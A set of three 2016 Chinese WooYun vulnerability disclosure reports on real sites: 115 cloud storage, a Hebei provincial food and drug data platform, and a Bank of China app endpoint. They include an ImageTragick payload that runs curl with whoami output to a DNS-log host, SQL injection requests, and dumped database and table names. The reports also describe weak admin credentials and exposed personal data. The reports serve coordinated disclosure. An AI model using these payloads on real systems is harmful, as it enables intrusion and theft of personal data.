漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：凑个热闹详细说明：115网盘上的一个应用场景，回想起来115网盘上传文件后会产生缩略图预览，那会不会有问题呢？还是提交那几行代码：code 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://"|curl http://`whoami`.xxx.dnslog.info")' pop graphic-context发现没有判断文件格式直接进行了转换：cloudeye显示： 漏洞证明：cloudeye显示：  修复方案：1.升级imagick2.科学地说，生成预览之前请判断合适的文件头版权声明：转载请注明来源 隐形人真忙@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：6确认时间：2016-05-05 14:52厂商回复：昨天就已关注，正在升级处理。谢谢最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：无语中。。。详细说明：http://**.**.**.**/河北省食品药品监督管理局数据平台登录口存在sql注入抓包放入sqlmap中可以跑出管理员密码这串md5看了开头就知道是什么了，太常见了admin/123456登录系统用户管理添加用户，加上所有的权限。。。不过用注入表再跑一个用户出来也是一样的可以看到数据量爆炸。。。百万从业人员的详细信息，姓名身份证等等等等其他还有各种食品药品监管信息等等漏洞证明：  修复方案：注入点修复版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-06 17:38厂商回复：CNVD确认并复现所述情况，已经转由CNCERT下发给河北分中心，由其后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：中国银行某站MySQL注射（涉及管理员密码/百万用户信息）详细说明： code 区域PUT /interFace/getAppUpdate.php HTTP/1.1 Host: open.boc.cn Content-Type: application/json Connection: close Accept: application/json User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0 Accept-Language: zh-cn Accept-Encoding: gzip, deflate Content-Length: 29 {"clientid":"399","type":"1"}code 区域注入参数#clientid正常返回内容code 区域{"clientkey":"399","version":"1.0.2","appversion":"177","appurl":"http:\/\/open.boc.cn\/apps\/appdownload\/41295","need_update":"0","new_function":"","appfilesize":"","incrementSize":""}报错code 区域<b>MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods` where client_key=399' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ) [3] => Array ( [errno] => 1064 ) ) 漏洞证明： code 区域available databases [11]: [*] bim [*] container [*] ec [*] ezcis [*] information_schema [*] mysql [*] ndbinfo [*] performance_schema [*] sap [*] test [*] ultraxcode 区域当前数据库：eccode 区域+-------------------------------+ | aps_account_log | | aps_ad | | aps_ad_custom | | aps_ad_position | | aps_admin_action | | aps_admin_log | | aps_admin_message | | aps_admin_user | | aps_adsense | | aps_affiliate_log | | aps_agency | | aps_apps | | aps_apps_bak150321 | | aps_apps_bak151205 | | aps_apps_cat | | aps_apps_relation | | aps_area_region | | aps_article | | aps_article_cat | | aps_article_cat_bak | | aps_article_comment | | aps_attribute | | aps_auction_log | | aps_auto_manage | | aps_back_goods | | aps_back_order | | aps_bank_info | | aps_banner | | aps_bonus_type | | aps_booking_goods | | aps_brand | | aps_card | | aps_card_trans_audit | | aps_cart | | aps_cat_recommend | | aps_category | | aps_collect_goods | | aps_comment | | aps_crons | | aps_custom_pads | | aps_customs | | aps_dcode | | aps_delivery_goods | | aps_delivery_order | | aps_dic_h5_interface | | aps_dic_paper_category | | aps_dic_site_letter | | aps_download_log | | aps_email_list | | aps_email_sendlist | | aps_error_log | | aps_exchange_goods | | aps_failedlogin | | aps_favourable_activity | | aps_feedback | | aps_friend_link | | aps_general_bank | | aps_general_interface | | aps_goods | | aps_goods_20141206 | | aps_goods_activity | | aps_goods_article | | aps_goods_attr | | aps_goods_bak150321 | | aps_goods_bak151205 | | aps_goods_cat | | aps_goods_gallery | | aps_goods_interface | | aps_goods_interface_bak151205 | | aps_goods_relation | | aps_goods_type | | aps_goods_whites | | aps_group_goods | | aps_interface | | aps_interface0321 | | aps_keywords | | aps_link_goods | | aps_log_conf | | aps_log_data | | aps_log_goods_download | | aps_mail_templates | | aps_manage_ip | | aps_match_goods | | aps_matchor | | aps_member_price | | aps_nav | | aps_order_action | | aps_order_goods | | aps_order_info | | aps_pack | | aps_package_goods | | aps_para_info | | aps_para_type | | aps_pay_log | | aps_payment | | aps_plugins | | aps_poster | | aps_poster_copy | | aps_products | | aps_reg_extend_info | | aps_reg_fields | | aps_region | | aps_role | | aps_searchengine | | aps_sessions | | aps_sessions_data | | aps_shipping | | aps_shipping_area | | aps_shop_config | | aps_snatch_log | | aps_special_url | | aps_stats | | aps_suppliers | | aps_tag | | aps_template | | aps_topic | | aps_user_account | | aps_user_address | | aps_user_app | | aps_user_bonus | | aps_user_feed | | aps_user_pictures | | aps_user_pictures_copy | | aps_user_rank | | aps_user_test_account | | aps_user_test_card | | aps_user_trans_audit | | aps_users | | aps_users_bak | | aps_users_bak150321 | | aps_users_bak150321_copy | | aps_users_copy | | aps_validate_code | | aps_validate_code_copy | | aps_virtual_card | | aps_volume_price | | aps_vote | | aps_vote_log | | aps_vote_option | | aps_wholesale | +-------------------------------+保证用户安全，不深入测试修复方案：过滤神马的版权声明：转载请注明来源 Aasron@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-05-05 22:07厂商回复：感谢白帽子最新状态：暂无